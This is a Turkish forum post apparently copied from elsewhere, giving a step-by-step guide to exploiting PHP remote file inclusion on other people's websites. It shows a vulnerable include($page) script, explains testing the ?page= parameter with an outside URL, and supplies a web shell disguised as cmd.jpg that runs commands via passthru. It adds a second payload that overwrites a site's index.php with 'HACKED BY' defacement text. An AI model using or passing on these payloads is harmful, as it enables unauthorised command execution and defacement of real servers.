php injection

PC güvenliği konusundaki bilgi paylaşım alanıdır.
Cevapla
Kullanıcı avatarı
velociraptor
Yottabyte4
Yottabyte4
Mesajlar: 55266
Kayıt: 14 Mar 2006, 02:33
cinsiyet: Erkek
Teşekkür etti: 21773 kez
Teşekkür edildi: 12661 kez

php injection

Mesaj gönderen velociraptor »

PHP enjeksyonunu nasıl yaparız :

ÖRNEK:

http://www.asd.com/index.php?page=downloads.php (index.php olması şart diil ama genellikle bu kullannılıyor)


Şimdi bunu açıklayacak olursak index.php dosyası diyoki sunucuya bana download.php dosyasını ekrana getir diyor. Yani demek oluyor ki index.php emir veriyor bana şunu şunu yap diye. Bizde bu açıktan yararlanarak sunucunun içindekiler ile oynicaz.



Index.php şundan ibaret :

<?php
include("header.inc");
include($page);
?>


bu kadar : )) PHP den alnayanlar zaten bunu gördükten sonra konuyu hemen çakar.

Diyelimki böyle bir site buldunuz. Enjeksyonu yapabilecekmiyiz yapamıcakmıyız önce onu kontrol edelim. ?page= yazan yerin yanına bir web adresi yazalım. Yazdıktan sonra enterladığımızda yazdığımz siteye yönlendiriliyorsak o zaman enjeksyonu gerçekleştirebiliriz.

ÖRNEK:

http://www.asd.com/index.php?page=http://www.yahoo.com yazdığımız zaman eğer kendimizi Yahoo.com da bulduysak o zaman enjeksyonu gerçekleştirebiliriz. YaşAsIINN LeaM : ))

Şimdi biz bu siteye PHP kod enjekte edecez. Nasıl mı : ))

İlk önce aşağıdaki PHP kodunu notpad’a yapıştırıp cmd.jpg diye kaydedip bir PHP sunucusuna upload edecez. (www.siteburg.com www.5gigs.com )


<?php
passthru($cmd);
?>

Upload ettikten sonra ?page= yazan yerin yanına upload ettiğimiz cmd.jpg dosyasının adresini yazıyoruz ve yanına ?cmd=ls yazıyoruz. Bunu yazdığımızda sunucunun içindeki her şey görünecektir : )) Eğer UNIX ten anlıyorsanız başka komutlar da verebilirsiniz ?cmd=mkdir ASDDSA fln …

ÖRNEK:

http://www.asd.com/index.php?page=http: ... jpg?cmd=ls yazdığımızda sunucudaki bütün dosyalar görünecektir. ?cmd= in yanına sunucudaki her hangi bir klasor yazdığımız zaman da o klasore gider.


Şimdide nasıl index atılacağını anlatacağım. Şimdi de bir PHP kod enjekte edeceis : )) Aşağıdaki koddan $text=” HACKED BY ASDDSA ” yazısını kendinize gore değiştirip de notpade kopyalayın : )) ( $text=” ” arasına htlm kodları yazabilriisnz ) sonrada muhaha.jpg yapıp kaydedin : )). Sunucunuza upload edin ve de cmd.jpg de yaptığımız gibi ?page= in yanına yazıyoruz .


<?php
$text=" ";
$file=fopen("index.php","w");
fwrite($file,$text);
fclose($file)
?>


ALINTIDIR
Cevapla